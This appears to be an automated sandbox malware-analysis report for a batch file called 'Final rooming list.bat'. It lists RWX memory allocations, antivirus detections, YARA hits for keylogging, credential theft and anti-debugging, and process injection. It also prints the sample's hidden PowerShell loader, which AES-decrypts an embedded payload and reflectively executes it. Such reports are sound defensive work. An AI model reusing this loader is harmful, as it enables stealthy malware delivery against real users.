NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04eca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ecb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ecc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ecd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ece000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ecf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ed0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ed1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ed2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ed3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ed4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Skyhigh	BehavesLike.PS.Dropper.hg
Kaspersky	Trojan.BAT.Obfus.gen
ZoneAlarm	Trojan.BAT.Obfus.gen
Fortinet	BAT/Kryptik.FU!tr

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 26, 2023, 10:23 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

"C:\Users\test22\AppData\Local\Temp\Final rooming list.bat.exe" -w hidden -c "$filePath = 'C:\Users\test22\AppData\Local\Temp\Final rooming list.bat'; $base64Pattern = '::(.*)'; $base64Code = ''; $found = $false; foreach ($line in [System.IO.File]::ReadLines($filePath)) { if ($line -match $base64Pattern) { $base64Code = $Matches[1].Trim(); $found = $true; break; } } if ($found) { $base64Code }; $key = 'S1h7yTlbJgEbe8fAoA0dwoHzF+iw98+iDWu9qKOt56s='; $iv = '9JUEq2XY9KUlMg+mRt4Zsg=='; $cryptedBytes = [System.Convert]::FromBase64String($base64Code); $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider; $aes.Key = [System.Convert]::FromBase64String($key); $aes.IV = [System.Convert]::FromBase64String($iv); $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC; $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $decryptor = $aes.CreateDecryptor(); $decryptedBytes = $decryptor.TransformFinalBlock($cryptedBytes, 0, $cryptedBytes.Length); $assembly = [System.Reflection.Assembly]::Load($decryptedBytes); $entryPoint = $assembly.EntryPoint; $null = $entryPoint.Invoke($null, @())"

cmdline

attrib +h "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat.exe"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2624 resumed a thread in remote process 2728
NtResumeThread Oct. 26, 2023, 10:23 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2728	1	0	0

Final rooming list.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All